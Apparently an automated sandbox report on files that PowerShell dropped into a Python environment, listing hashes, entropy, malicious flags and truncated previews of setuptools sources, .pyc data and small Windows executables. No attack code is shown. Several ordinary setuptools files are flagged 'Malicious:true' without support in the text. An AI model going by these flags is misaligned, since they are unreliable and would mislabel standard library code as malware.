                                                                                                                                                                                                                              SHA-512:BF00CC5B6AB5B5819D2DEB374F3AA6A25C5ED4D9372B4FB90C5605DD0E90528C914BFBAAFC499940EB301AEBFA8E05503D9282FA3DA7CED86C14017040BA8019
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Marker file for PEP 561.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8425
                                                                                                                                                                                                                              Entropy (8bit):4.573127423025622
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:3d9LqSY7fPZ9NE1wzz6Qu0uO0h9hD76NQsa9L:3d9Ye1wPjWO0h9hfc5a9L
                                                                                                                                                                                                                              MD5:873640DC68DF8F121D1BD22159A2E1F0
                                                                                                                                                                                                                              SHA1:AFBA147A869B5F3A241AF399EBFA87311671E91F
                                                                                                                                                                                                                              SHA-256:6A3CED387FBD23B280FF8C2A0D8CA0B476BAC54055660169999F0513BE071C72
                                                                                                                                                                                                                              SHA-512:E9DDFCF03E8B75B7B651CD2649558EB5CA9F69E7860ECC0EFBDFA390DA7D88B0B7ADC0864D0AB08524B8A038E05A43BB1C1E70F323E5CC3A26BBC3D14EF92AFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import io.import posixpath.import zipfile.import itertools.import contextlib.import sys.import pathlib..if sys.version_info < (3, 7):. from collections import OrderedDict.else:. OrderedDict = dict...__all__ = ['Path']...def _parents(path):. """. Given a path with elements separated by. posixpath.sep, generate all parents of that path... >>> list(_parents('b/d')). ['b']. >>> list(_parents('/b/d/')). ['/b']. >>> list(_parents('b/d/f/')). ['b/d', 'b']. >>> list(_parents('b')). []. >>> list(_parents('')). []. """. return itertools.islice(_ancestry(path), 1, None)...def _ancestry(path):. """. Given a path with elements separated by. posixpath.sep, generate all elements of that path.. >>> list(_ancestry('b/d')). ['b/d', 'b']. >>> list(_ancestry('/b/d/')). ['/b/d', '/b']. >>> list(_ancestry('b/d/f/')). ['b/d/f', 'b/d', 'b']. >>> list(_ancestry('b')). ['b']. >>> list(_ancestry('')). []. """. path =
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7331
                                                                                                                                                                                                                              Entropy (8bit):4.504387917941744
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:+mRvcD1biN3nMwUmUDspvqn/T7GXMHLFefyHi:+mk1YnMwPqainfG8EfyC
                                                                                                                                                                                                                              MD5:C1C97D74C271DC9313EC726A8933FB19
                                                                                                                                                                                                                              SHA1:BFF8695DED8CA4F60FE0BAB3FAE3B21E3435D117
                                                                                                                                                                                                                              SHA-256:9512BB97B1A4A4B25E36A9C44895947C3ADEE2AE3047DC7A67C583DDC21A8177
                                                                                                                                                                                                                              SHA-512:57EA084985E35840B4D842DC10CBB855105EA8F4E51EDF610A4C841DCD702758430C0FD8251993EF235D80C0295BE1DF2B250A7FC1734DDEB14D79B266164379
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Utilities for extracting common archive formats"""..import zipfile.import tarfile.import os.import shutil.import posixpath.import contextlib.from distutils.errors import DistutilsError..from ._path import ensure_directory..__all__ = [. "unpack_archive",. "unpack_zipfile",. "unpack_tarfile",. "default_filter",. "UnrecognizedFormat",. "extraction_drivers",. "unpack_directory",.]...class UnrecognizedFormat(DistutilsError):. """Couldn't recognize the archive type"""...def default_filter(src, dst):. """The default progress/filter callback; returns True for all files""". return dst...def unpack_archive(filename, extract_dir, progress_filter=default_filter, drivers=None):. """Unpack `filename` to `extract_dir`, or raise ``UnrecognizedFormat``.. `progress_filter` is a function taking two arguments: a source path. internal to the archive ('/'-separated), and a filesystem path where it. will be extracted. The callback must return the desired extract
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18734
                                                                                                                                                                                                                              Entropy (8bit):4.675829237183407
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:1esqJc8cqBU9ARoTVRF5beJEWdJ2wS2iGj9m7eC1k79dUlIm71mwR0FGfHpsxcZQ:1/qJctARaFsdJ2wiGR79YYwR4Gvq3
                                                                                                                                                                                                                              MD5:48AFDC70ED2DD0ACDECDBCAA236AAA06
                                                                                                                                                                                                                              SHA1:F3427F143D4592892C917D6B70EF9A6059BB90A1
                                                                                                                                                                                                                              SHA-256:E905BF3E7A6BC4DEDBE43C2D4DBE6876278390751B7D534B72C61E0E0757A8CB
                                                                                                                                                                                                                              SHA-512:B7EB0BDA29056EC64110BFFC82A4E8A37D6335FDF0E3E8D3E034F17B26D2AB40F4C1F7B0863B58AC262F286AC79C203AAD6771A95A2B7987F78F8E040C2645D1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""A PEP 517 interface to setuptools..Previously, when a user or a command line tool (let's call it a "frontend").needed to make a request of setuptools to take a certain action, for.example, generating a list of installation requirements, the frontend.would call "setup.py egg_info" or "setup.py bdist_wheel" on the command line...PEP 517 defines a different method of interfacing with setuptools. Rather.than calling "setup.py" directly, the frontend should:.. 1. Set the current directory to the directory with a setup.py file. 2. Import this module into a safe python interpreter (one in which. setuptools can potentially set global variables or crash hard).. 3. Call one of the functions defined in PEP 517...What each function does is defined in PEP 517. However, here is a "casual".definition of the functions (this definition should not be relied on for.bug reports or API stability):.. - `build_wheel`: build a wheel in the folder and return the basename. - `get_requires_for_build_
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11776
                                                                                                                                                                                                                              Entropy (8bit):5.815097917685549
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Lbn3OxRXIxs99n62jPXIqPWJ7ojOg6GRqIzz89MY6vgJ2J5pz18M4A:fVq99n/P4/JEj36GRqI8WY6vgJ2H+
                                                                                                                                                                                                                              MD5:46E9A273D6587191B512FD1050DC1FC4
                                                                                                                                                                                                                              SHA1:015535F3274F28CF0B01A3E858DE4ECF9FB4EF34
                                                                                                                                                                                                                              SHA-256:32ACC1BC543116CBE2CFF10CB867772DF2F254FF2634C870AEF0B46C4B696FDB
                                                                                                                                                                                                                              SHA-512:7195EFC6F03924CD9F5EDA03D8EF3497B533952F4DE9602D856703581777C8519B4B86915D25E4457C2FB0D5FAD5F69A7CBD3679AC412C881FA7151CC10D109C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z.2..da..da..da.c.a..dasee`..dase.a..dasea`..dase``..daseg`..da.ce`..da..ea..da.d``..da.d.a..da.df`..daRich..da................PE..L....'hd...............$.....................0....@..........................p............@..................................6.......P.......................`.......2...............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......(..............@....rsrc........P.......*..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14336
                                                                                                                                                                                                                              Entropy (8bit):5.250475018659325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:a4Kpyocs8v22MgJb926etBG0bqIzHYAlgdQS5tObcP:aNRcJrMgb9RuBGiqIrYdQn
                                                                                                                                                                                                                              MD5:91538DF53511BE83EE84A43E97430041
                                                                                                                                                                                                                              SHA1:32F4A73F1F15E2CC04DA20DFFD60E5AA40D32466
                                                                                                                                                                                                                              SHA-256:BBB3DE5707629E6A60A0C238CD477B28F07F0066982FDA953FA6FCEC39073A4A
                                                                                                                                                                                                                              SHA-512:AE56D867EAA5C884899591954EBF632F8C7DFF2F18539B28277E6E523310A21986203B626E27FB1A968CF03C350EC04360308940BEE761769CEFD4B5B2917813
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........b.c.1.c.1.c.1..61.c.1...0.c.1..X1.c.1...0.c.1...0.c.1...0.c.1...0.c.1.c.1.c.1...0.c.1..Z1.c.1...0.c.1Rich.c.1................PE..d....'hd.........."....$....."......@..........@..........................................`..................................................:.......p.......`..................0....5...............................3..@............0..P............................text............................... ..`.rdata..,....0......................@..@.data...H....P.......0..............@....pdata.......`.......2..............@..@.rsrc........p.......4..............@..@.reloc..0............6..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) Aarch64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13824
                                                                                                                                                                                                                              Entropy (8bit):5.023766662793062
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:LVkt/Z00GRvoFkNxTnGyjT3GixIt0mqIzxBykIfyQS5tOzIJb:LVsx00ggYlj+t0mqIGkIfyQnze
                                                                                                                                                                                                                              MD5:526C3500E7D91EFBE8E4242D7EB7E985
                                                                                                                                                                                                                              SHA1:463CF7B9A2334EB33D5E89E33A164E74DCE6D0E9
                                                                                                                                                                                                                              SHA-256:B9A7D08DA880DFAC8BCF548EBA4B06FB59B6F09B17D33148A0F6618328926C61
                                                                                                                                                                                                                              SHA-512:ABCB513A585BF01E808A04A999BD3DC21D258B241C378D62B3AD75C24D866BA6391BA9DF8156D78E9B16C7A96E4BDBFB567493968B051AB4E71B0383DF19AED6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........b...1...1...1...1...1...0...1..x1...1...0...1...0...1...0...1...0...1...1...1...0...1..z1...1...0...1Rich...1................PE..d....'hd.........."....$.......................@..........................................`..................................................8.......p.......`.. ...............$....4..............................p3..@............0...............................text...4........................... ..`.rdata.......0......................@..@.data........P......................@....pdata.. ....`.......0..............@..@.rsrc........p.......2..............@..@.reloc..$............4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11776
                                                                                                                                                                                                                              Entropy (8bit):5.815097917685549
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Lbn3OxRXIxs99n62jPXIqPWJ7ojOg6GRqIzz89MY6vgJ2J5pz18M4A:fVq99n/P4/JEj36GRqI8WY6vgJ2H+
                                                                                                                                                                                                                              MD5:46E9A273D6587191B512FD1050DC1FC4
                                                                                                                                                                                                                              SHA1:015535F3274F28CF0B01A3E858DE4ECF9FB4EF34
                                                                                                                                                                                                                              SHA-256:32ACC1BC543116CBE2CFF10CB867772DF2F254FF2634C870AEF0B46C4B696FDB
                                                                                                                                                                                                                              SHA-512:7195EFC6F03924CD9F5EDA03D8EF3497B533952F4DE9602D856703581777C8519B4B86915D25E4457C2FB0D5FAD5F69A7CBD3679AC412C881FA7151CC10D109C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z.2..da..da..da.c.a..dasee`..dase.a..dasea`..dase``..daseg`..da.ce`..da..ea..da.d``..da.d.a..da.df`..daRich..da................PE..L....'hd...............$.....................0....@..........................p............@..................................6.......P.......................`.......2...............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......(..............@....rsrc........P.......*..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):396
                                                                                                                                                                                                                              Entropy (8bit):4.598719086670211
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1BNMbJdkyp9tTikNAlxtTiG5ySFLLwzpCPLtTi/5ySFLL3tTi81qB8:1BNMoa9Y3HYG5XmpCTY/5X3YjB8
                                                                                                                                                                                                                              MD5:ADF722BC4B673EF721F591DABFC10F6D
                                                                                                                                                                                                                              SHA1:BC5415F8241275DAA2D9456263CF3B22C1D7B8E8
                                                                                                                                                                                                                              SHA-256:1D9952A69381F15AE8EF77DFBCFFB1ACE46E32B8781A75643AA26CA45446F0F8
                                                                                                                                                                                                                              SHA-512:965CF226A438228DA086C4289CC8EFB86F461B6292F5889CE37D8C035FAAED485AFA6A9D6AB9BE5C5F57A12C762392A3EA09DD3531234FCBA4294E267A2140BD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from distutils.command.bdist import bdist.import sys..if 'egg' not in bdist.format_commands:. try:. bdist.format_commands['egg'] = ('bdist_egg', "Python .egg file"). except TypeError:. # For backward compatibility with older distutils (stdlib). bdist.format_command['egg'] = ('bdist_egg', "Python .egg file"). bdist.format_commands.append('egg')..del bdist, sys.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):632
                                                                                                                                                                                                                              Entropy (8bit):5.305551403268926
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:o+/l0Tt2xW/FtGRMnkhVLFMbrqTi9TibRwKNxVl2uBjaAkkWvhs2bwlh:t/eTYwTGRmUBMXLoGKNxf2PAkk6Fwb
                                                                                                                                                                                                                              MD5:35B1DB7576E55B104C93772A2CC72287
                                                                                                                                                                                                                              SHA1:CD1381FADD9A26775276FC92AB1467C5DC70B2C4
                                                                                                                                                                                                                              SHA-256:94E78CF46F54E839EF1E332AC894BC06B7AA2806602F18FC7A2A32E0F06F791C
                                                                                                                                                                                                                              SHA-512:6EFD1A046EEABF639221A365D7480D4876244FE4EF50546881D9B282B9B92058AC78A365275CC160032E56B9F111354BA73BA36D9138329E5D04200759701D33
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................d.d.l.m.Z...d.d.l.Z.d.e.j...................v.r...d.e.j...................d.<...[.[.y.[.[.y.#.e.$.r/..d.e.j...................d.<...e.j...................j...................d...........Y.[.[.y.w.x.Y.w.)......)...bdistN..egg)...bdist_eggz.Python .egg file)...distutils.command.bdistr......sys..format_commands..TypeError..format_command..append........LC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/__init__.py..<module>r........ss..........)..........%..%..%....,.'H.........e..$......3.E.3..........,.&G.........U..#...........$..$.U..+....3....,.s....../../A#..".A#.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6551
                                                                                                                                                                                                                              Entropy (8bit):5.304539771149898
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:N0zGzO4StSCHydC+J8d+xqkrvWEq2c2jUDDyfElTzNvCUO3mTP6OzL:NaJfydEDeBq2cSVEl/NvBO3nU
                                                                                                                                                                                                                              MD5:C729C9A900F69CD8D82F90A7AADF3180
                                                                                                                                                                                                                              SHA1:D4A4CC38DC2C61260962C084A3632D10F42520AD
                                                                                                                                                                                                                              SHA-256:33C6AE3AC38F5A85DCB6323C60448B4D147B340DD93660C87AEB24BFCBCF43D3
                                                                                                                                                                                                                              SHA-512:F1D5846AA8E38DC75CC537E08CAF338D29CC91CBCC0955935EA4C93D653B8E95F757E45F4D6E4722FB711A1E66CFFB8C2AA80C6C52F9C1D5D7A0E88589DDD92B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf~.........................r.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.d.........Z.e.e.d.f.....Z.e.Z.e.j,..................Z.d.e.d.e.e.e.f.....d.e.e.e.....e.e.e.e.....f.....f.....f.d...Z.d.e.e.e.f.....d.e.e.e.e.....f.....f.d...Z.d.e.d.e.e.e.e.....f.....d.e.e.e.....e.e.e.e.....f.....f.....f.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z y.).aS...Helper code used to generate ``requires.txt`` files in the egg-info directory...The ``requires.txt`` file has an specific format:. - Environment markers need to be part of the section headers and. should not be part of the requirement spec itself...See https://setuptools.pypa.io/en/latest/deprecated/python_eggs.html#requires-txt......N)...defaultdict)...filterfalse)...Dict..List..Tuple..Mapping..TypeVar.....)..._reqs)...yield_lines)...Requirement.._T..install_requires..extras_require..returnc.....................0.....t.........|.........}.t.........|.|.........S.).z
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3518
                                                                                                                                                                                                                              Entropy (8bit):5.233545519774984
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:kwTUNEuxML2SCicGthaGcxYbvDuk2mVxyiUmb5izCXzprfnXaSe1E7pW:kcUNLi2SCicGthaGcCwjmlbXzFfICW
                                                                                                                                                                                                                              MD5:E0421E0580C7D0984F733582A9B22EE1
                                                                                                                                                                                                                              SHA1:DA8D988A749A295A4C927F4F40CD36736945BF0F
                                                                                                                                                                                                                              SHA-256:0CD580721BFC1ED76BDD29854D56D6DF9555552393529584972838E606A868FE
                                                                                                                                                                                                                              SHA-512:6DC4B89F181AB9F946212BE8D2DF7D7E48A715CFEF10E2D28AA8EF4E176F31E402EF94BEFE6C3AB9B60C2EE5D38C2B2ADAAE2AECCF7FC6081F956D14E73803AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfO.........................F.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d...Z...G.d...d.e.........Z.d...Z.y.)......)...DistutilsOptionError)...edit_config..option_base..config_filec.....................t.....d.D.]...}.|.|.v.s...t.........|.........c...S...|.j...........................|.g.k7..r.t.........|.........S.|.S.).z4Quote an argument for later parsing by shlex.split())..."..'..\..#)...repr..split)...arg..cs.... .IC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/alias.py..shquoter........sC....... .............8......9..............y.y.{.s.e.......C.y.......J.....c.....................j.....e.Z.d.Z.d.Z.d.Z.d.Z.d.g.e.j...................z...Z.e.j...................d.g.z...Z.d...Z.d...Z.d...Z.y.)...aliasz3Define a shortcut that invokes one or more commandsz0define a shortcut to invoke one or more commandsT)...remove..rz.remove (unset) the aliasr....c.....................J.....t.........j...................|...........d.|._.........d.|._.........y.).N).r......i
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23667
                                                                                                                                                                                                                              Entropy (8bit):5.063854179161435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:ZqS0xb479H6EPrEGw0xkK4IFjox8W0cF4TeHVtN71:Z90x2F6EPgGw0uKJix8C4TexJ
                                                                                                                                                                                                                              MD5:B8870AA8FE951832A220FDDD783A7B7E
                                                                                                                                                                                                                              SHA1:B526437C9B58B524A2DF70775D43AE527EB883A9
                                                                                                                                                                                                                              SHA-256:8D60BED48F2E348136F8B8D5BDC45EF7BA38D3E40D59EF264D10DB9C63CD82D3
                                                                                                                                                                                                                              SHA-512:321792246C7958CB36A0C5F228865D916DF285D9FA2FF8896E063C2524852793263286B37764F6C796F8695A56787F6568EAB1504D1ED177D6B5B109CA1B3A91
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfI@........................6.....d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d...Z.d...Z.d...Z.d...Z...G.d...d.e.........Z.e.j9..................d.j;..................................Z.d...Z.d...Z d...Z!d.d.d...Z"d...Z#d...Z$d...Z%g.d...Z&d.d...Z'y.).z6setuptools.command.bdist_egg..Build .egg distributions.....)...remove_tree..mkpath)...log)...CodeTypeN)...Library)...Command.....)...ensure_directory)...get_path..get_python_versionc...........................t.........d.........S.).N..purelib).r............MC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/bdist_egg.py.._get_purelibr........s..........I......r....c.....................~.....d.|.v.r"t.........j...................j...................|.........d.....}.|.j...................d.........r.|.d.d...}.|.S.).N...r......modulei....)...os..path..splitext..endswith)...filenames.... r......strip_moduler........s@......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1965
                                                                                                                                                                                                                              Entropy (8bit):5.272802202600224
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:KdBGCqzym3G7AbxsQu3S6kNFFWA8oSg2djIkG:aPGntbyzSaBoSxIL
                                                                                                                                                                                                                              MD5:1FA0CCB582CD03A313F8588D8C5E10C4
                                                                                                                                                                                                                              SHA1:57582F896DBFCAD44C1DD27ED102E9EEA75CA74F
                                                                                                                                                                                                                              SHA-256:667F953B1DD6515E74550A0F6CAD3523C6849A8D0445D98DD425A06EB5FA1FDD
                                                                                                                                                                                                                              SHA-512:08E91072A850791458581D2106D28C15A9FC7572F95147502ADF139D4A853B76024BA2412F796A437CA3E941499F4E3448FDBBAFD4E7FBDC071D3337A9DD3077
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................L.....d.d.l.m.c...m.Z...d.d.l.m.Z.....G.d...d.e.j...........................Z.y.)......N.....)...SetuptoolsDeprecationWarningc...........................e.Z.d.Z.d.Z.d...Z.d...Z.y.)...bdist_rpma..... Override the default bdist_rpm behavior to do the following:.. 1. Run egg_info to ensure the name and version are properly calculated.. 2. Always run 'install' using --single-version-externally-managed to. disable eggs in RPM distributions.. c..........................t.........j...................d.d.d.d.............|.j...................d...........t.........j...................j...................|...........y.).Nz.Deprecated commandz.. bdist_rpm is deprecated and will be removed in a future version.. Use bdist_wheel (wheel packages) instead.. z.https://github.com/pypa/setuptools/issues/1988).i..............)...see_url..due_date..egg_info).r......emit..run_command..origr......run)...selfs.... .MC:\U
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5323
                                                                                                                                                                                                                              Entropy (8bit):5.139270925527522
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:gSPtz/U3gj8PseTR73M6auDEnbjL+cRsUux9yteET:gSlz/U3HDR7HDEnbf+ci8
                                                                                                                                                                                                                              MD5:EF454DF518A1B6B6688E61FB87C98205
                                                                                                                                                                                                                              SHA1:172AE007D1245267982DB3455301F5792777CA80
                                                                                                                                                                                                                              SHA-256:25E7C52156FDE145D7438BA3A07406643E007FFF6B8490C80B07F1533DBEE36A
                                                                                                                                                                                                                              SHA-512:768A779365B4AB6C34E421B0F048BAF346D0B4F4667FF4845F50035F1196D181C92BBDE90BC59EEDB8B5B1DFBF6F858E15D4F5766CCEA879BC017712F5C93E3A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................X.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...h.d...Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...Dict..List..Protocol)...build>......build_py..build_ext..build_clib..build_scriptsc.....................*.....e.Z.d.Z.e.j...................d.d...Z.y.).r....N)...__name__..__module__..__qualname__.._build..sub_commands........IC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/build.pyr....r........s...........&..&.q..).Lr....r....c.....................z.....e.Z.d.Z.U.d.Z.d.Z.e.e.d.<.....e.e.d.<.....d...Z.d...Z.d...Z.d.e.e.....f.d...Z.d.e.e.....f.d...Z.d.e.e.e.f.....f.d...Z.y.)...SubCommanda....In order to support editable installations (see :pep:`660`) all. build subcommands **SHOULD** implement this protocol. They also **MUST** inherit. from ``setuptools.Command``... When creating an :pep:`editable wheel <660>`, ``setuptools`` will try to evaluate. custom ``build`` subcommands using the following procedure:.. 1. ``se
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3835
                                                                                                                                                                                                                              Entropy (8bit):5.326176329935942
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:T3tKkjVTVT5uNAHojqIRpSgEw191ovxFtdjNwnEYbKLHOAXpMG0sHN+:jtRRV5uN1jqshEcYvDLjNNYWK9gE
                                                                                                                                                                                                                              MD5:36D6E48CCB9454EC4C424240E3E94585
                                                                                                                                                                                                                              SHA1:A7069A4FC5A574043469596C1D2876E326BC22E8
                                                                                                                                                                                                                              SHA-256:48A3AB99EF69FCE8E597BE89325390597C6098405FE1CB84048721CA23E7F4CF
                                                                                                                                                                                                                              SHA-512:A3791AAF59156DC1F57F689F08BAD4D23F7B45900000DBBB9ADAA6F239196E05C9CED1867CDFB964D8C40AA515C913AB5B538281C0EF073105BE2CEA90BC9863
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.d.l.m.c...m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.m.Z.....G.d...d.e.j...........................Z.y.#.e.$.r...d.d.l.m.Z...Y..#w.x.Y.w.)......N)...DistutilsSetupError)...log)...newer_pairwise_group.....c...........................e.Z.d.Z.d.Z.d...Z.y.)...build_clibav.... Override the default build_clib behaviour to do the following:.. 1. Implement a rudimentary timestamp-based dependency system. so 'compile()' doesn't run every time.. 2. Add more keys to the 'build_info' dictionary:. * obj_deps - specify dependencies for each object compiled.. this should be a dictionary mapping a key. with the source filename to a list of. dependencies. Use an empty string for global. dependencies.. * cflags - specify a list of additional flags to pass to. the compiler.. c.....................j.....|.D...]-..\...}.}.|.j.........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22710
                                                                                                                                                                                                                              Entropy (8bit):5.1904904441112665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Hgry2Xq4URn9Ce58KepjbPmEi8JIpdPMn+5jkmSqWhN:H14Kn9CE4PVjyvaYImSqWhN
                                                                                                                                                                                                                              MD5:067E2C14D9A15A7CD4272D3A2EF216AB
                                                                                                                                                                                                                              SHA1:6DB652050E989709F0A83326E9D2FF21644399AE
                                                                                                                                                                                                                              SHA-256:E2BA9163000A22D7110DEDCEA5D1B1EA63691B089B86C24EF2A5EC9C42CAECC6
                                                                                                                                                                                                                              SHA-512:F4DB7250C5FFE9424CE4A2C4D098D1CF5D4854296A20A80EC3329C930AA858D9102AA0B8E100B81728D23521AE8FC70EB0BB0A8420AB72C549AC363285FDF904
                                                                                                                                                                                                                              Malicious:false
